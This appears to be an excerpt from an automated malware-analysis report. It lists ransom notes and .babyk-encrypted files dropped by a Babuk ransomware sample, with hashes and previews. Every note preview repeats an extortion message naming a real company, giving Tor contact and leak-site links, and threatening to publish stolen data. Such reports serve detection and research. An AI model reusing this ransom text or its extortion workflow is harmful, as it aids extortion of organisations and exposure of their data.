                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.491471774409048
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlmogxnAdotCb19l1DERJ5tMWtDeAoLQVov6a5Ylv/PbmuJwbcNLUxNvEEn:OFFCb1HYMWtjo16a58/jmCwbcNL0vtn
                                                                            MD5:EBE819FD8C674E9A6ED9677A87A93E68
                                                                            SHA1:8FCF389887F00D39A84082B66CE456ADE40A7DFC
                                                                            SHA-256:8A775611C374B9D062434CDA79BDD9556802F94099A071FEF7247F73883E2837
                                                                            SHA-512:0770F4EED04386E76332D1D6FDDED5D15F52001DBF101FC32F10757111EBB2E4648ECFAEA2D327864DE9A9A76CE12D43FF360FA4657145F275403ECCE1C6DBDB
                                                                            Malicious:false
                                                                            Preview: ....H??.N.T{...Y..7oe..h.-~d..A.Q'>.......@.......Oz.t. \H........a..J...u...l...TV. %q..e....(s..^*m...te...T...o,p;.....m......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.976794139227306
                                                                            Encrypted:false
                                                                            SSDEEP:192:MLZedcAohKe9Jn8fyXbrgmhupz43IW+5H6sboH:MLZeKAMKeIyfgmhupzgI/oH
                                                                            MD5:9FC006A552AFA1D641FC0A3993515C93
                                                                            SHA1:645C1E4349E7557C0C7236AFC71D40ECD1D33C64
                                                                            SHA-256:07052D9142F56D37C945EA012E2754C8568676EE3EA60B84E054428F5B524F1E
                                                                            SHA-512:555DE566EC4B131C5F06EF217A06D9E82BB719EC718719A02FC620444B369E6B07FC8C66D1EC3A25E0865A40B4CEC7C1629A3FD43F409C5317FE9EB9985617E5
                                                                            Malicious:false
                                                                            Preview: P.h.D. ..:H6.D..'..w.UD?..`....).%..h.}.Ai#{..y.t8..#Z..K....BQ...?e..G.4..~.#-.#...<...?9,..n..)G...L.^......Jy...G...w$....2>...x.mJ.N:.#.....}qs....7.....x.6.......E$..Pm....ws.....OI.d..g.>...L%._....\0/k.6c.v.k..d....E..".Z.b./v...]...]t-}8./.....[.#x/b....ng...U...\..pWv.<T.....5... .mv0.x.v.F.x.R....a-...)D.&.M`]k........Y.2.cu......C.....V.ht.....I."vrx}..;....>9.v..\...MU{d...W=.7..K/.J....j.~..~K1.D......d.......[}]d[}#..a....q...pC.C...No.. ..2..n......-...<M..g....Y.._.4.C.DQq..]<.8.6Z.....?..R..=)......[wd'....H.....Zu.B6..wj...../j..y....h...~....b..jt...H.w.y@....,#X.....O.<..".Z7vAU8L.K.;...%e.igZ..<>.[2....`.y.o.Ysh.3r+.".fd..;G7z..MV..d.......Vm....?...O...mv....>7*9...M[...[.....HI.P...>d..}...G.o.......A..O.Qg...$.O.=.."G..... .".X.?..8.@^(.Ni!/.3*X.n.n.1..W.H...v)....A[(u.X...R./#.3........./.$@.[.D.8....m{....F.Q.3.]J...:...l...$.`J..UM..N.....o.w..d..-.V.BX.....I....$.^R..+..7..5s...`...-n./j.Y.V.x
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
